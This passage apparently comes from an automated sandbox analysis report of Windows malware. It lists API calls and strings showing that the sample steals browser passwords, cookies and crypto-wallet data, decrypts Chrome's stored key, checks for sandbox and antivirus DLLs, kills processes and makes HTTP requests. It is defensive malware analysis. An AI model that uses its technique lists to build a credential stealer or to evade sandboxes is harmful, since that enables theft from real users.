                                                                                                                                                                                                                                                                                • FindFirstFileA.KERNEL32(00000000,?,?,?,\*.*,?,?,0042150A), ref: 0040A63D
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,77735E70,00000000,0040D14C,?,00000000), ref: 0040246E
                                                                                                                                                                                                                                                                                • strlen.MSVCRT ref: 0040A738
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: lstrcpy$lstrcat$FileFindFirstlstrlenmemmovestrlen
                                                                                                                                                                                                                                                                                • String ID: C:\ProgramData\$CURRENT$IndexedDB$Local Extension Settings$Opera$Plugins$Sync Extension Settings$Wallets$\*.*$_0.indexeddb.leveldb$chrome-extension_
                                                                                                                                                                                                                                                                                • API String ID: 1425610001-450108884
                                                                                                                                                                                                                                                                                • Opcode ID: 139ffd1411e68c882e5f60f44f434026bf7f517aa634323aadea9402351866cf
                                                                                                                                                                                                                                                                                • Instruction ID: 1a3cb996083095315d2ff66196e58a8cf7e0966e26cbd8d21691459e5d96898c
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 139ffd1411e68c882e5f60f44f434026bf7f517aa634323aadea9402351866cf
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 841243316102589BCB14EBA1CD95AEE7779AF54308F40009EF5066B182DFBC6EC5CBA9
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                  • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                  • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                  • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                • FindFirstFileA.KERNEL32(00000000,?,?,?,0042119A,?,?,0042150A), ref: 0040C80A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,77735E70,00000000,0040D14C,?,00000000), ref: 0040246E
                                                                                                                                                                                                                                                                                • strlen.MSVCRT ref: 0040C893
                                                                                                                                                                                                                                                                                • memcmp.MSVCRT(00000000,00000000,00000000,00000001), ref: 0040C8C2
                                                                                                                                                                                                                                                                                • strlen.MSVCRT ref: 0040C91D
                                                                                                                                                                                                                                                                                • memcmp.MSVCRT(00000000,00000000,00000000,0042113D,00000002,?,?,?,00000001), ref: 0040C94B
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,0042113D,00000002,?,?,?,00000001), ref: 0040C9AE
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: lstrcpy$lstrcatmemcmpstrlen$??3@FileFindFirstlstrlenmemmove
                                                                                                                                                                                                                                                                                • String ID: C:\ProgramData\$\..\$prefs.js$profiles.ini
                                                                                                                                                                                                                                                                                • API String ID: 3809920955-2608480989
                                                                                                                                                                                                                                                                                • Opcode ID: b82d6e280c7ec2f173d30f79c5aac1989165e53126787770b6279d5565a2d5f3
                                                                                                                                                                                                                                                                                • Instruction ID: 416ba331a07f3905739cc071a47e34269f16b80876d8e7813359335a266a51ee
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b82d6e280c7ec2f173d30f79c5aac1989165e53126787770b6279d5565a2d5f3
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4932D7319002189BCB14EBB1C9D5AEEB778BF48304F40455EF41667192DF7CAAC9CBA9
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: FileFindstrcpy$strlenwsprintf$CloseFirstFolderNextOperationPath_splitpathisupper
                                                                                                                                                                                                                                                                                • String ID: %s\%s$%s\*$.
                                                                                                                                                                                                                                                                                • API String ID: 3519957579-2663966076
                                                                                                                                                                                                                                                                                • Opcode ID: cf9b2e7014ef6816a469ec533b7518abd9e477652080199a49752e259d229905
                                                                                                                                                                                                                                                                                • Instruction ID: 114bed65e9d4b9d73eb4094e4860af952423d6fe10318c0fdbdbb5acdc2bd80f
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cf9b2e7014ef6816a469ec533b7518abd9e477652080199a49752e259d229905
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D8413B71908348AFD2209B21DC05BEB77BCAFD5304F04452EF99982251E779A689C7AB
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(?,avghookx.dll,?,?,?,004185FC), ref: 0040121E
                                                                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(?,avghooka.dll,?,?,?,004185FC), ref: 0040124E
                                                                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(?,snxhk.dll,?,?,?,004185FC), ref: 0040127E
                                                                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(?,sbiedll.dll,?,?,?,004185FC), ref: 004012AE
                                                                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(?,api_log.dll,?,?,?,004185FC), ref: 004012DE
                                                                                                                                                                                                                                                                                  • Part of subcall function 004011B0: lstrcmpiW.KERNEL32(?,?,771AF360,?,?,?,00401320,pstorec.dll,?,?,?,004185FC), ref: 004011DA
                                                                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(?,dir_watch.dll,?,?,?,004185FC), ref: 0040130E
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: lstrcmpi
                                                                                                                                                                                                                                                                                • String ID: api_log.dll$avghooka.dll$avghookx.dll$cmdvrt32.dll$cmdvrt64.dll$dir_watch.dll$pstorec.dll$sbiedll.dll$snxhk.dll$vmcheck.dll$wpespy.dll
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004042B3,00416A04,?,?,00416A04), ref: 004028AB
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,00416A04,?,?,00416A04), ref: 004028BB
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,00416A04,?,?,00416A04), ref: 004028CB
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402790: lstrlenA.KERNEL32(00000000,?,?,00416A04,?,?,00416A04), ref: 004028EA
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402790: InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 004028FA
                                                                                                                                                                                                                                                                                  • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                • InternetOpenA.WININET ref: 004042E1
                                                                                                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,https), ref: 004042F4
                                                                                                                                                                                                                                                                                • InternetConnectA.WININET ref: 0040432D
                                                                                                                                                                                                                                                                                • HttpOpenRequestA.WININET(00000000,GET,?,HTTP/1.1,00000000,00000000,00000000,00000000), ref: 00404360
                                                                                                                                                                                                                                                                                • InternetSetOptionA.WININET(00000000,0000001F,FFFFFFFF,00000004), ref: 00404387
                                                                                                                                                                                                                                                                                • HttpSendRequestA.WININET ref: 0040439B
                                                                                                                                                                                                                                                                                • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 004043B3
                                                                                                                                                                                                                                                                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004043F0
                                                                                                                                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040446D
                                                                                                                                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00404478
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Internet$Http$CloseHandleOpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                                                                                                                                                                                                                                                                • String ID: ERROR$GET$HTTP/1.1$https
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                  • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                  • Part of subcall function 004076B0: CreateFileA.KERNEL32 ref: 004076EE
                                                                                                                                                                                                                                                                                  • Part of subcall function 004076B0: GetFileSizeEx.KERNEL32(00000000,?), ref: 00407700
                                                                                                                                                                                                                                                                                  • Part of subcall function 004076B0: LocalAlloc.KERNEL32(00000040,003694E8), ref: 00407723
                                                                                                                                                                                                                                                                                  • Part of subcall function 004076B0: ReadFile.KERNEL32(00000000,A075FFA4,003694E8,?,00000000), ref: 00407744
                                                                                                                                                                                                                                                                                  • Part of subcall function 004076B0: LocalFree.KERNEL32(A075FFA4), ref: 00407763
                                                                                                                                                                                                                                                                                  • Part of subcall function 004076B0: CloseHandle.KERNEL32(00000000), ref: 0040776C
                                                                                                                                                                                                                                                                                  • Part of subcall function 004115B0: LocalAlloc.KERNEL32(00000040,?,?,00000000,?,?,00416A58,00000000,00000000), ref: 004115D4
                                                                                                                                                                                                                                                                                • StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,00000000,?,?,?,00000000), ref: 0040794C
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,-00000010,0041FE20,?,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040796B
                                                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00407999
                                                                                                                                                                                                                                                                                • CryptUnprotectData.CRYPT32 ref: 00407AFA
                                                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,?), ref: 00407B13
                                                                                                                                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 00407B39
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 00407BC2
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Local$Alloc$File$Freelstrlen$CloseCreateCryptDataHandleReadSizeUnprotectlstrcpy
                                                                                                                                                                                                                                                                                • String ID: "encrypted_key":"$AES$ChainingMode$ChainingModeGCM$DPAP$_key.txt
                                                                                                                                                                                                                                                                                • API String ID: 72760943-530840575
                                                                                                                                                                                                                                                                                • Opcode ID: 80c8c99dc66d1a3a314694ca8b656682875a6de58e5a181b00e7ea29ddd83769
                                                                                                                                                                                                                                                                                • Instruction ID: 10bc9677902d6ee6c816a36e6349628b10f5ac32de00f2ba7c41a4f543123621
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 80c8c99dc66d1a3a314694ca8b656682875a6de58e5a181b00e7ea29ddd83769
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 93A1C571E042159BDB10DFA1CC85BAE7BB5FF44304F10452AE901BB291D778BA45CBA6
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                  • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                  • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                  • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                • FindFirstFileA.KERNEL32(00000000,?,?,?,0042119A,?,?,0042150A), ref: 004094C5
                                                                                                                                                                                                                                                                                  • Part of subcall function 004113B0: GetSystemTime.KERNEL32(?,ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890,0042150A), ref: 004113D8
                                                                                                                                                                                                                                                                                  • Part of subcall function 004113B0: lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0042150A), ref: 0041143E
                                                                                                                                                                                                                                                                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 004095D2
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                  • Part of subcall function 004076B0: CreateFileA.KERNEL32 ref: 004076EE
                                                                                                                                                                                                                                                                                  • Part of subcall function 004076B0: GetFileSizeEx.KERNEL32(00000000,?), ref: 00407700
                                                                                                                                                                                                                                                                                  • Part of subcall function 004076B0: LocalAlloc.KERNEL32(00000040,003694E8), ref: 00407723
                                                                                                                                                                                                                                                                                  • Part of subcall function 004076B0: ReadFile.KERNEL32(00000000,A075FFA4,003694E8,?,00000000), ref: 00407744
                                                                                                                                                                                                                                                                                  • Part of subcall function 004076B0: LocalFree.KERNEL32(A075FFA4), ref: 00407763
                                                                                                                                                                                                                                                                                  • Part of subcall function 004076B0: CloseHandle.KERNEL32(00000000), ref: 0040776C
                                                                                                                                                                                                                                                                                • strlen.MSVCRT ref: 00409766
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Filelstrcpy$Locallstrcatlstrlen$AllocCloseCopyCreateFindFirstFreeHandleReadSizeSystemTimestrlen
                                                                                                                                                                                                                                                                                • String ID: C:\ProgramData\$\key4.db$cookies.sqlite
                                                                                                                                                                                                                                                                                • API String ID: 621517324-1530792146
                                                                                                                                                                                                                                                                                • Opcode ID: efc8b8d459f8125ef32f95508c9d4e357bcd32b5b3231743abb90690a61e27b0
                                                                                                                                                                                                                                                                                • Instruction ID: 855358d25c22b69566fbc42c17e74533ab55524d0b71b666bfbe4b79f85c7bd2
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: efc8b8d459f8125ef32f95508c9d4e357bcd32b5b3231743abb90690a61e27b0
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6CC1B631A102189BCF14EBB1CC95AEE7779AF44304F44005EF80667292DB7C6EC5CBA9
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00411FB6
                                                                                                                                                                                                                                                                                • Process32First.KERNEL32(00000000,00000128), ref: 00411FC4
                                                                                                                                                                                                                                                                                • Process32Next.KERNEL32(00000000,00000128), ref: 00411FD0
                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00411FF1
                                                                                                                                                                                                                                                                                • Process32Next.KERNEL32(00000000,00000128), ref: 00411FFE
                                                                                                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,?), ref: 0041200A
                                                                                                                                                                                                                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0041201E
                                                                                                                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 0041202D
                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00412036
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 3836391474-0
                                                                                                                                                                                                                                                                                • Opcode ID: 73d56ab98b17da3653dff67e089b2de93a438a2d9c22f275f8cd819916ddfa29
                                                                                                                                                                                                                                                                                • Instruction ID: 924cd2998aa8e6582c44da8d0305fac9719003efd41fa9ed3311d7015259d757
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 73d56ab98b17da3653dff67e089b2de93a438a2d9c22f275f8cd819916ddfa29
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0B115231104305AFD3201F61BD0CFAFBAADEBC9785F04501DFA45D62A0DF79A851CAA9
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                  • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                • GetKeyboardLayoutList.USER32(00000000,00000000,0042150A), ref: 00410A11
                                                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 00410A23
                                                                                                                                                                                                                                                                                • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00410A2D
                                                                                                                                                                                                                                                                                • GetLocaleInfoA.KERNEL32(00000000,00000002,?,00000200), ref: 00410A4D
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                  • Part of subcall function 00411270: memset.MSVCRT ref: 00411281
                                                                                                                                                                                                                                                                                • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,?,00000000,00000200,?,?,?), ref: 00410AB4
                                                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000), ref: 00410B18
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: lstrcpy$InfoKeyboardLayoutListLocalLocale$AllocFreelstrcatlstrlenmemset
                                                                                                                                                                                                                                                                                • String ID: /
                                                                                                                                                                                                                                                                                • API String ID: 2580590304-4001269591
                                                                                                                                                                                                                                                                                • Opcode ID: 47d8d58765390bafa4d4b739f7cf5a28c409f74912168362484b764a7be3d9a5
                                                                                                                                                                                                                                                                                • Instruction ID: eea5c3a77f3b4bcccf0633d63ef4e7b0d3230a8af430361ee2a26d3609cb3d8b
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 47d8d58765390bafa4d4b739f7cf5a28c409f74912168362484b764a7be3d9a5
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5831A8313043186BD7106B919C89FAF779DEB85748F00051EF9469B291DABCAD8487A9
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?,?,?,00000000,?,?,0000001C,0042150A), ref: 00412065
                                                                                                                                                                                                                                                                                • Process32First.KERNEL32(00000000,?), ref: 00412071
                                                                                                                                                                                                                                                                                • Process32Next.KERNEL32(00000000,?), ref: 0041207D
                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,0000001C,0042150A), ref: 00412091
                                                                                                                                                                                                                                                                                • Process32Next.KERNEL32(00000000,?), ref: 00412099
                                                                                                                                                                                                                                                                                • OpenProcess.KERNEL32(00000001,00000000,?,?,?,?,?,?,00000000,?,?,0000001C,0042150A), ref: 004120B6
                                                                                                                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,?,?,00000000,?,?,0000001C,0042150A), ref: 004120C5
                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,0000001C,0042150A), ref: 004120CE
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 3836391474-0
                                                                                                                                                                                                                                                                                • Opcode ID: a0b7ef02e1583a47d1d21b47bccce1f0927895e069a30e1cc4337bfc16cdf067
                                                                                                                                                                                                                                                                                • Instruction ID: 36dad1cb0fcbca0ffdfdd7c06b199559f2c5def7befbfc21f7e452e0f853ed5d
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a0b7ef02e1583a47d1d21b47bccce1f0927895e069a30e1cc4337bfc16cdf067
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 93017571201214AFE7205B20BD48FBFBEADEF85781F14151DF605D6190CBA99CA1C6BA
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,00403103,00000000,00000000,?,?,?), ref: 004116E9
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 004116FC
                                                                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,00000008,?), ref: 00411706
                                                                                                                                                                                                                                                                                • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 0041171D
                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00411733
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 00411741
                                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,?), ref: 0041174B
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Heap$BinaryCryptProcessString$AllocateErrorFreeLast
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 798923657-0
                                                                                                                                                                                                                                                                                • Opcode ID: 337ad27f9ad8079b430cc19cc8451ae19a993c84305c3c21a313def544d549b9
                                                                                                                                                                                                                                                                                • Instruction ID: b00e23e61dcd96af2d5a42df421a2e3100774d4436a7fe2bda2c6e10979a2865
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 337ad27f9ad8079b430cc19cc8451ae19a993c84305c3c21a313def544d549b9
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2C114575204202AFE7208F25EC44F67BBA9EF88700F15081DF6A2973A0DB75EC41CBA5
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(?,?,00421509,?,?,?,?,?,?,AV: ,?,?,00421509,?,?,?), ref: 0041099D
                                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00417920,?,?), ref: 004109AB
                                                                                                                                                                                                                                                                                • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00417920,?,?,?,?), ref: 004109B2
                                                                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 004109DC
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
